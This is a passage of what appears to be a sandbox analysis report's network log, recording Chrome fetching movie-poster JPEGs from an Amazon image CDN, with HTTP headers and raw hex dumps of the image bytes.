                                                                                                                                                                                          Data Ascii: 3QWbRcf5,jaAUWRCL|q@>~PCDd9IH]+t[hqJ2*?Xz)!}?OkAbP:()O;?H2qzhGU|-vju,vLvPt*ZVju%@xBP(s#3lQO&
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: a8 00 36 8b be a7 97 7d 8b 69 23 12 d3 73 53 7d d3 25 92 37 52 fc 77 1a f7 73 b2 2e 70 7d 7c bb 21 6d fb 20 fb 98 59 cf 55 60 1b 6e ae c3 c9 5f dc 5a e0 10 b0 de 89 55 1f 47 19 4b 6e 7c 70 3e 87 7d c2 7f 4e f5 29 ca 0c 8a 21 24 89 c1 a2 82 3b 16 3c a5 8c db 9e 46 9e 7e c9 d3 c3 d6 18 2f 4c 27 f7 59 86 d5 98 7f 4e e0 24 41 90 e3 eb 1b 28 d8 34 d2 be 9f 75 9e c2 f4 4d 7b 7c da 52 96 00 17 1b 30 28 ed 8d 95 c7 6b 36 18 02 0a 83 e9 af c6 e0 de bb 72 03 ee 6f b1 98 14 f9 6f 08 6b e9 95 56 60 51 35 32 30 12 f5 d4 b3 a0 5c bb 21 a8 b1 4e bb 57 69 ad b7 2b 75 23 68 4c b2 b1 62 91 0a 15 3a 32 cd ff 00 49 53 eb f2 23 47 47 94 e5 ea 55 92 e9 60 65 ab 23 9d 28 ef e4 66 fd a6 b2 df 76 5a 10 68 5b 92 f3 e5 3f 7a 6f 35 b0 81 c1 85 25 d5 03 d9 81 e4 34 3e a5 dc c3 fe 21
                                                                                                                                                                                          Data Ascii: 6}i#sS}%7Rws.p}|!m YU`n_ZUGKn|p>}N)!$;<F~/L'YN$A(4uM{|R0(k6rookV`Q520\!NWi+u#hLb:2IS#GGU`e#(fvZh[?zo5%4>!
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: a6 dd 28 e8 3b 8d 48 a9 53 51 f6 fc 9a ac a3 34 94 8b d8 c8 e8 6b 35 1d 4a 7b 94 3a 7c 08 aa 2b 17 c1 95 99 19 99 44 78 f7 8d 6b d4 c9 21 4f 72 04 29 39 d9 a4 e9 66 94 74 31 6d 9a 91 53 51 a8 a4 3f 26 a5 65 19 a5 94 8b d8 a1 d0 d6 6a 3a 94 3c 50 99 3b 2a 8a c5 f1 6e 78 99 ab 3f f1 fb 9a a0 f7 32 63 92 98 e6 ee 3c 31 14 14 c7 2f 32 3c 11 03 89 b2 0d d4 88 11 0a 1c a6 3f 41 cb f0 49 af 2b 14 cd 9e 2b 23 05 3f 32 35 36 b0 77 19 fc 1a cd 56 50 f0 bf fd 99 a4 ec fb 4a c5 f1 c3 99 94 95 99 6f 19 b1 ca 19 13 8a 74 20 4a 79 e2 ff 00 e8 da 3b 17 16 7c 6a c7 bf 0e 98 af f5 c4 d9 7f ca 62 92 58 23 c3 39 99 a4 fe 0c f6 7e c2 2a 8a c4 2f cd b9 44 ac d6 69 3b 51 47 90 a5 d3 99 97 31 dc cb fa 11 49 ee bb 9d 9d 0a bb 1d b1 4b 7a 1b 97 9d 91 4f 9d 4b 1f 1b 15 fc 4e 4d e7
                                                                                                                                                                                          Data Ascii: (;HSQ4k5J{:|+Dxk!Or)9ft1mSQ?&ej:<P;*nx?2c<1/2<?AI++#?256wVPJot Jy;|jbX#9~*/Di;QG1IKzOKNM


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          75192.168.2.1649807151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:08 UTC660OUTGET /images/M/MV5BMGVhYmRlMjEtMTZhYy00ZTgyLWI5YzMtMTFmMzg2OWEwZWRhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:09 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 12690
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 790659e0-b3c1-4803-83c1-8a023b29a880
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 25 Jul 2016 19:45:55 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 04 Nov 2044 12:13:50 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 851276
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:09 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100140-IAD, cache-ewr-kewr1740072-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c2 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fb 0e c2 b2 c7 4b 2d 29 65 85 61 61 50 5a 54
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"3K-)eaaPZT
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 70 15 36 c7 2b aa ba aa b4 60 86 08 68 00 00 43 13 04 c0 06 21 84 41 88 65 26 10 9a 90 86 09 0c 44 81 42 71 21 0b 02 ca ad a8 b8 00 00 11 a0 5d f1 c3 db 37 da 06 a2 f3 db 9c 2f 74 d2 7c c9 2f 4c 6b 79 83 b9 23 e7 07 a4 1c 0f 7d 63 3c c7 d2 96 c3 55 ab 4e a4 d2 5a 9b 75 a8 e5 1a f4 23 13 2d 80 19 10 44 42 44 a1 28 16 80 00 0b 98 e9 d2 f9 66 7f a0 93 a5 1c 2f a0 0c 79 8f 7b b1 1a e1 f1 fd 02 2b ca f3 7e 9c 8b fc 8b d5 84 ab 9e ea 0b 8e 5b 96 f5 22 74 e6 f5 3d ea 4e 5f 5b dd 48 d3 f9 87 b3 8b af d9 05 e4 00 11 9c 05 65 76 05 56 d2 5a 00 26 c8 8c 2b 56 85 2a f0 c6 8e 58 61 c7 38 35 eb 62 1a c7 b2 0d 69 b2 0d 7b cf 0c 19 e5 33 1a 57 b2 89 5b 10 18 20 07 5c e2 16 57 60 53 75 45 83 21 29 21 0c 10 c1 3a d1 69 5a 2d 2b b0 00 01 40 b0 84 0b 8a 5a da a3 12 d7 54 ec
                                                                                                                                                                                          Data Ascii: p6+`hC!Ae&DBq!]7/t|/Lky#}c<UNZu#-DBD(f/y{+~["t=N_[HevVZ&+V*Xa85bi{3W[ \W`SuE!)!:iZ-+@ZT
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 00 e1 4b c2 09 f0 07 a9 a8 ac 84 40 28 ac 9b ba 01 3d 3d 57 fd f8 0e b1 ec 7b 4e 68 78 21 d3 78 45 34 bc cd e5 93 73 a7 37 81 d4 c4 33 61 64 1a 4a b7 a2 83 c3 a6 aa fb 69 e8 23 80 27 44 d7 72 68 c7 4d 82 c8 c2 d4 ff 00 0f 61 43 c3 48 28 52 59 08 3f bb a9 89 e2 aa 9d f1 b4 93 56 6e f2 99 41 3b f7 03 a4 70 ef de c8 d0 ad 85 45 0c 35 17 d4 a9 f2 c0 3b c3 0f 95 f7 fe 6d 27 84 53 d2 9b b7 dc 0c 0d e1 0e 02 38 76 3e 0c 70 11 c3 b1 f0 63 80 8e 1d 8f 83 1c 04 70 ec 7c 18 e0 23 87 63 e0 c7 03 1e fe 0c 70 11 c3 bf 82 28 70 11 c3 bf 83 1d 23 87 7f 04 50 e9 1c 3b f8 22 87 48 8c 3b f6 e4 90 b0 ad 76 ec 8d 40 5a e3 84 67 6e e8 ce 05 97 d4 0b 9b eb 00 51 9c 58 96 fd 4f 0b ea 1a 41 b6 b8 1c 8a 91 ba 06 fb fb 45 0e 91 c3 bf 72 c1 59 39 ad 3c ec ac ac 15 95 96 50 ac d0 ac
                                                                                                                                                                                          Data Ascii: K@(==W{Nhx!xE4s73adJi#'DrhMaCH(RY?VnA;pE5;m'S8v>pcp|#cp(p#P;"H;v@ZgnQXOAErY9<P
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: a3 27 07 35 1d 17 35 26 a5 a4 e3 57 2d 19 45 29 3e 37 8e 43 8a ab 16 83 70 e4 f8 23 2c 64 a4 4b a9 73 72 ca 33 c6 ea 5a ee 50 51 94 7a 97 1c 69 75 15 9a 21 af 84 66 85 24 9d b5 d5 4a a7 19 f3 fe 1c 72 e5 5c 6f 4d 47 a8 c7 4d e9 fd ca ee af e5 7f ff c4 00 39 10 00 02 00 02 06 07 06 05 02 07 01 00 00 00 00 00 00 01 02 11 21 31 41 51 61 91 03 10 12 20 30 50 b1 40 52 71 81 a1 c1 22 32 42 60 d1 72 f0 23 53 82 92 a2 e1 f1 b2 ff da 00 08 01 01 00 09 3f 02 e5 0c 63 18 c6 31 8c 63 18 c6 31 8c 63 18 c6 31 8c 63 18 c6 31 8c 7b 98 f2 6c 79 36 3c 9b 1d ca 68 f7 2d 86 2c eb 5e 42 bf d2 be 82 ad b1 52 ac c4 55 c3 3f 71 1f 57 fd 2a d9 6f 29 08 fd d6 29 34 ed 14 eb c2 ab 05 43 53 99 dc 51 7e 45 f3 7b 8a 74 b9 59 50 a6 a2 65 93 b2 ea 7a 0a ff 00 41 7d 11 bc 8f a4 56 53 85
                                                                                                                                                                                          Data Ascii: '55&W-E)>7Cp#,dKsr3ZPQziu!f$Jr\oMGM9!1AQa 0P@Rq"2B`r#S?c1c1c1c1{ly6<h-,^BRU?qW*o))4CSQ~E{tYPezA}VS
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: d6 1a bf cf a5 13 41 73 2c 3e 88 9c 10 d9 ac 22 d1 c0 b1 0e 46 a3 9a 00 2c 07 bd a5 51 84 72 56 37 9f 9d e8 94 e4 5f 24 e6 c0 77 de 7e d0 26 02 04 43 5d 0a d9 ba 73 e9 b2 9c 96 c9 b9 51 84 17 18 13 6e e9 cd 82 f5 8e 5f 49 d7 8c e0 a3 42 64 29 61 a8 c9 00 50 2a 36 9f b9 57 6d e8 ac f5 4a 25 77 19 77 8a bd 75 40 a0 40 b8 c3 9a 33 03 7a 2b 62 3e c4 96 ab 72 eb ba 76 63 3d 71 e2 6d 5b 41 c0 11 d8 e8 f8 23 42 b6 03 80 23 b1 d1 f0 46 85 6d 07 00 47 63 a3 e0 8d 0e 4b 60 38 02 3b 1d 1f 04 6d 5b 40 8a 08 ec 74 7c 11 a1 5b 01 c0 11 d8 e8 f8 2d 1e 1a 4a da 0e 00 8e c7 47 ae 72 cc 27 30 f2 43 a2 09 e4 66 50 0d 12 ef 72 2f 7c 90 77 b8 81 76 6b 51 10 40 24 02 68 1e 4a ab 00 e7 cb ed 62 0a de 9a f2 0f 73 ce 88 80 12 4a 40 2e 46 6a 44 80 5e 4b 2d d6 05 48 27 bb 00 67 0a
                                                                                                                                                                                          Data Ascii: As,>"F,QrV7_$w~&C]sQn_IBd)aP*6WmJ%wwu@@3z+b>rvc=qm[A#B#FmGcK`8;m[@t|[-JGr'0CfPr/|wvkQ@$hJbsJ@.FjD^K-H'g
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: c7 63 23 d3 e0 8d 0e 4a 8c 83 8a ce 6f b1 f0 54 1c 8a da 04 78 58 cd d3 d4 5b 98 9d 1c 41 e5 46 59 8a 48 92 1e 90 77 55 86 3c 73 fc 07 47 34 60 a9 18 00 66 50 e6 05 40 74 01 67 0b 8c 60 4d 09 46 e1 44 4c 76 c6 ad d7 e1 b5 12 d1 17 49 24 c0 00 5a 49 a2 33 72 32 a9 9e 68 a6 d0 c1 35 1a f3 66 c1 30 a9 30 16 45 90 c6 c3 1c 23 a0 45 b8 c1 dd 39 a6 0e 11 93 60 ca 6f 00 b9 8f 13 47 c1 8b 5e 98 4a f8 98 6c 8c 50 2f 90 30 87 88 73 66 28 99 b1 22 8e 20 5a 8a 41 2a 02 1f 69 b7 c0 b2 48 80 4e 1e 93 43 91 54 e4 09 b8 58 cd ea a7 02 48 40 00 e4 92 21 90 c9 b2 45 8f 6d 85 34 e3 6b 96 4b 93 d9 06 01 84 26 92 70 62 63 5a 59 3a 98 27 1b 61 92 fd ac 20 11 17 5a 33 80 a6 7c 12 28 a4 80 12 0e 6c a1 03 0a 2b b1 75 92 d2 37 06 55 ab f7 3b 10 da 44 4e 29 35 aa 70 18 40 1c 62 0d
                                                                                                                                                                                          Data Ascii: c#JoTxX[AFYHwU<sG4`fP@tg`MFDLvI$ZI3r2h5f00E#E9`oG^JlP/0sf(" ZA*iHNCTXH@!Em4kK&pbcZY:'a Z3|(l+u7U;DN)5p@b
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 14 67 56 f4 34 52 32 98 3a 80 d0 d2 f7 61 61 69 94 0f 63 4a c7 26 b7 98 c8 dc 45 73 2e 6f a4 34 6d 39 5e eb 62 44 3b 5b 43 d0 91 69 67 35 d0 6e 51 98 c1 80 50 66 c0 c5 b5 34 07 9d 45 f1 6c 58 8d 0b 58 76 2e 87 42 41 15 e4 ac d2 d2 d6 5a 3a 32 d6 b3 09 81 72 4e 4d df 32 90 2b 9b 6e a6 04 ec 37 7d b6 2c ee 90 4e 39 7b 0c f3 7d 08 b3 07 16 33 c1 72 89 43 04 03 75 7b ab cc bc 29 6a 21 2d 87 f8 4d eb c8 e4 3a 2b f4 d7 b2 cb 2b 6b be 5e 6d be 72 f7 2e 38 9d 01 31 a4 28 fb 98 7b 40 a9 0b 38 1a cd de 3b db ef 72 da 75 b7 75 de ef df 07 c1 1f f5 93 46 6b 5f 1c ba 4d 53 06 cb aa 8f 62 85 9c ea 50 ce f7 4d 9a bb 83 21 ca 34 1d 97 fa b7 e5 8d 0d 14 de 56 12 df dd 65 dc bc 4d b7 4b dd fe db 97 65 00 68 ab 12 cf 65 2b dd 86 8f 14 00 16 28 fd 8c 11 74 c9 15 ba 5d a9 6f
                                                                                                                                                                                          Data Ascii: gV4R2:aaicJ&Es.o4m9^bD;[Cig5nQPf4ElXXv.BAZ:2rNM2+n7},N9{}3rCu{)j!-M:++k^mr.81({@8;ruuFk_MSbPM!4VeMKehe+(t]o
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: b8 06 11 92 9d cd 9b 76 b3 24 aa b1 45 b4 5d d1 e8 dc 85 ef 46 c6 95 b1 c0 2c 34 d5 6e 29 ea 09 49 d8 ef 2a 0b 85 45 d0 df 21 97 32 e4 b3 dd ec 94 03 ac ed 89 43 bd e5 63 dc 64 13 3d fb a3 85 c8 1d e3 57 ce 1d 62 4a c3 1c 79 27 da bd f8 4f c3 f5 27 9c e9 c2 71 79 8f a1 e2 47 82 8d e8 fc c0 0d 6f bd 41 0b 2b fd f4 ae bd c7 78 29 31 81 8c 62 b0 54 11 0a e0 1f 8b 8a e8 29 e9 1f 96 3b 7f 1c 45 8a 7b 57 1d ae 08 32 b8 a2 cf b2 ed 0d 0a 8c b0 35 b5 9e 7e 2a 86 1b d1 85 4e 63 3c ed f5 21 92 a6 20 81 ab d4 65 9e 5f a9 3c e7 48 c1 84 20 1a e5 7a 6a df 61 43 da 79 f1 32 0c 09 6c 6b 5f 12 d8 47 42 81 e8 d8 4a 95 2a 27 0a 84 31 e1 70 7d 62 be 15 c4 54 fd 92 8b aa 02 88 b9 78 e1 f9 3b 92 b3 60 4a 31 87 91 31 2d e3 36 4e 45 3f 0e 75 05 2f 18 1c 44 31 55 37 63 4f 33 73
                                                                                                                                                                                          Data Ascii: v$E]F,4n)I*E!2Ccd=WbJy'O'qyGoA+x)1bT);E{W25~*Nc<! e_<H zjaCy2lk_GBJ*'1p}bTx;`J11-6NE?u/D1U7cO3s
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: a8 73 58 78 53 03 74 a2 14 b1 53 91 86 59 10 82 f0 54 8e cf 9d aa e5 50 13 18 70 5a 8e 56 b0 05 b2 d5 46 14 3e c1 54 e1 3c cb 8f b6 1a a8 02 08 82 26 44 74 8c cd 8f 16 de 80 1c d5 c0 4a 39 2b 30 2b 25 ed 7a 81 69 69 65 e4 6a 82 fc ca c1 12 e5 08 ae 25 16 aa 5a 99 4a bf 14 22 88 07 97 b2 32 d3 d4 48 96 d3 17 78 42 16 2b 75 44 5b 42 e8 b7 d3 e7 3a 41 e4 72 8d e1 1f 23 a9 c3 71 e2 db 03 8e 7b 00 05 56 1d 63 8d 1b 54 6d 14 f6 a9 76 c5 a6 c4 60 0f ec 83 de 4d 70 b9 a2 57 b9 57 2f 66 95 a4 d2 a0 38 7c af 3a 67 89 6b ae 1f 73 7d d1 bc 42 de b8 80 0e 1e 7a 63 2a 04 06 79 10 96 00 b9 63 e3 96 d2 f3 f4 08 98 e4 5e 29 9a 44 b2 96 aa dd 1b 61 98 fd 4b f8 c6 39 cb a2 e1 a1 81 55 da c8 1a 60 42 49 cc a3 56 5a ae 56 ca 33 72 ee ae 96 0a 13 b2 61 50 40 40 5b 0c ea c2 ed
                                                                                                                                                                                          Data Ascii: sXxStSYTPpZVF>T<&DtJ9+0+%ziiej%ZJ"2HxB+uD[B:Ar#q{VcTmv`MpWW/f8|:gks}Bzc*yc^)DaK9U`BIVZV3raP@@[
                                                                                                                                                                                          2024-12-15 11:38:09 UTC288INData Raw: f1 02 c8 07 89 fa 80 ab f1 3d a7 83 7f 92 97 5e 57 b4 af 89 fa 8f 81 7e a5 3c 4f d4 4b 67 93 b4 a7 89 fa 9e 0d fe 41 1a f1 fd a7 2a bc 9d a7 6b cd da 53 cb c9 da 52 78 7f 13 b7 e4 ed 10 3c ff 00 89 8e eb c9 da 0b cb c9 da 78 7f 84 a3 68 f1 e9 33 d7 9f ed 1c 46 5a 36 e3 da 14 0e 13 f5 7f e1 be 37 c2 f8 5c b9 72 e5 cb 97 2e 5c b9 72 e5 cb ff 00 f2 7f ff c4 00 1b 11 00 01 04 03 00 00 00 00 00 00 00 00 00 00 00 00 01 00 31 50 60 40 70 71 ff da 00 08 01 02 01 09 3f 00 be 84 22 4c 33 61 0d a3 cb bf ff c4 00 2a 11 00 02 00 05 01 04 0b 00 00 00 00 00 00 00 00 00 00 01 11 12 21 31 41 71 02 10 22 51 20 30 32 50 60 61 80 81 a1 c1 f1 ff da 00 08 01 03 01 09 3f 00 ee b5 d1 5e 7b f4 11 af a5 dd 0c 70 bd fd 98 ca 59 18 53 33 3c 48 b3 2d 61 96 8c bd 46 2a 2a 37 37 e1 7b
                                                                                                                                                                                          Data Ascii: =^W~<OKgA*kSRx<xh3FZ67\r.\r1P`@pq?"L3a*!1Aq"Q 02P`a?^{pYS3<H-aF**77{


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          76192.168.2.1649809151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:08 UTC676OUTGET /images/M/MV5BOTMxNDVmNTQtNWQ5My00MjE0LWE2MzAtOTVlNzg5OWFmOTQ4XkEyXkFqcGdeQXVyMTQ3Njg3MQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:09 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 27912
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: d8e7937c-16df-4cc4-a205-db08a3c43e61
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 27 Jul 2017 05:03:13 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Tue, 08 Nov 2044 07:21:09 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 1526911
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:09 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000109-IAD, cache-nyc-kteb1890058-NYC
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 93 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 08 00 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 00 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 a0 5e ab a7 2c 1e 86 e4 83 39 d6 59
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6^,9Y
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 98 ff 00 5d f2 a3 13 f3 21 8f 6c 73 b6 44 12 47 06 b8 b1 2a de cb a8 69 ba 19 a2 28 59 5d ab 1e 97 4d 29 a8 92 2a 92 ce 69 c1 d7 39 4f 83 e2 fa ff 00 06 4f b4 5c 03 90 b9 f4 b8 b6 cb e4 31 87 b5 e4 6c b3 9a 96 91 91 6f 3c fb 2b 92 c5 d1 74 b5 d7 9b a4 85 6b 39 fb 39 2e 6a 91 3a 19 09 73 31 0c 2e 64 1e 59 10 ba ee f0 e5 7a 95 c2 c7 3c c4 73 86 53 0d 69 12 fa d5 19 05 7d 2c 1d 56 67 08 ce 80 62 25 da c5 26 7a a7 2e b6 5e 79 1f 91 ea c9 9d 53 0e 9d 8f 2d f4 45 1e 67 8e 8a af 44 f4 1d ed 1e e8 a7 ea ed 18 6b 61 9b d6 2f 20 e5 78 1c 9e c6 b5 16 6b 1c 39 b7 96 c8 f3 51 b1 e5 d3 2f 94 d2 37 21 8d 90 3e 73 52 e4 a6 af 20 6d b8 d8 6b f7 16 59 7a d8 47 aa 67 47 51 b2 78 b6 7e 54 d0 19 70 e6 d0 6f cd 3e 4c b5 ec a2 cf 62 7a dd dd d8 65 a2 38 54 d6 99 06 7c eb 47 b1
                                                                                                                                                                                          Data Ascii: ]!lsDG*i(Y]M)*i9OO\1lo<+tk99.j:s1.dYz<sSi},Vgb%&z.^yS-EgDka/ xk9Q/7!>sR mkYzGgGQx~Tpo>Lbze8T|G
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: c2 00 03 c1 09 2a 09 3c c2 8b 3c b7 1e 69 bc d1 c4 69 77 cc a0 64 9a 77 2f 8c 6d 0d 07 72 45 6d dd ca ce 4c fd cb 3d 53 dc 09 80 ee 84 80 f7 2b 77 9d c4 13 e7 71 af d3 3b a1 38 7d d1 90 1d dc 01 5d dc 41 4a 7b 98 78 57 74 22 1f 74 87 11 dd 68 01 9d cc be 1f dc 47 2c ee 8d ff c4 00 2f 10 00 02 02 02 01 03 03 03 04 02 03 00 03 00 00 00 01 02 00 03 04 11 12 05 13 21 10 14 31 20 22 32 06 23 30 33 15 41 24 42 51 34 43 71 ff da 00 08 01 01 00 01 08 02 39 f2 bc c0 fe 0c bf 33 b6 74 29 cd e6 c1 4d c7 82 93 3d eb c4 ce 6f f6 a7 90 06 5d 99 c7 c2 8c d6 89 7f 35 d8 a9 b9 ae e7 bb 6e 5a f4 bb 29 95 88 99 37 b2 11 ac 6b fb 83 ce 55 ad 5f 1d 52 c5 94 19 95 73 21 1a c7 bb 98 8e dc 41 31 2e 72 c2 64 5c ca da 17 5a c0 2c a1 8b 2e ce 45 a5 5a 23 7d bb 36 64 16 3e 05 8c b2
                                                                                                                                                                                          Data Ascii: *<<iiwdw/mrEmL=S+wq;8}]AJ{xWt"thG,/!1 "2#03A$BQ4Cq93t)M=o]5nZ)7kU_Rs!A1.rd\Z,.EZ#}6d>
                                                                                                                                                                                          2024-12-15 11:38:09 UTC1378INData Raw: 38 54 b3 3e 81 7d 4c 86 da 8d 6c 54 e3 0f b8 4a 54 01 e3 52 c8 ab ca 75 3a be dd cc 7a bb 87 ce 30 75 3c 4f 51 bf 87 93 d2 3f f9 15 cc c0 71 ef 25 2d ea 05 d7 8f a3 fc 18 08 e2 bb c9 b3 4c c2 1f 81 2b b4 d4 76 b3 8b 38 e2 aa 78 aa ab 5d c1 cb 95 c4 da 5b 53 06 7d 64 5c 22 64 ab 1e d9 a0 3d 17 f6 db a8 71 56 47 51 eb f1 2c b2 26 3b de 0b 2f 1e 30 2f 22 04 03 5e 23 ca 71 10 96 25 ba 6b 62 6f 56 e4 64 0d c4 c9 c8 6f 8f 71 71 3a 98 c8 78 f9 ba ae e0 d1 a7 1d 68 de 8b 72 f2 7a 85 fd e7 9d 0c f1 c9 5d f5 5a f6 8a fe b6 02 41 98 ee b6 a0 23 28 87 66 f5 c6 c2 36 fc d3 88 10 cc de 9f c8 6d 6d a0 d6 4c a3 23 83 a1 39 19 1c ef 67 4b b9 0f be 2b 9c 9a 12 d9 9e fd c3 c2 2d 83 53 70 18 f6 ea 7b 66 b0 6c d2 be df 5c 7f c9 ef e6 9a a9 b5 d5 92 38 94 89 75 41 d4 82 2a 0c
                                                                                                                                                                                          Data Ascii: 8T>}LlTJTRu:z0u<OQ?q%-L+v8x][S}d\"d=qVGQ,&;/0/"^#q%kboVdoqq:xhrz]ZA#(f6mmL#9gK+-Sp{fl\8uA*
